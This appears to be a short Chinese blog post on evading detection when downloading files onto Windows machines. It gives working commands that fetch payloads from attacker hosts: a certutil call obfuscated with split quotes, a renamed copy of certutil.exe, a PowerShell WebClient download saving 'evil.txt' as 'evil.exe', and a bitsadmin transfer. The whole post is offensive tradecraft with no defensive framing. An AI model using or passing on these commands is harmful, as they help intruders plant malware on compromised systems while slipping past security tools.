博客

certutil已经被检测了但是绕过还是很简单

certutil  -""u""r""l""c""a""c""h""e"" -split -f http://192.168.0.131:5555/2.jpg a.jpg

或者copy出来在运行

copy c:\windows\system32\certutil.exe c.exe
c.exe -urlcache -split -f  http://192.168.0.131:5555/2.jpg  test.aaa

powershell

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.28.128/imag/evil.txt','evil.exe')

Bitsadmin

bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt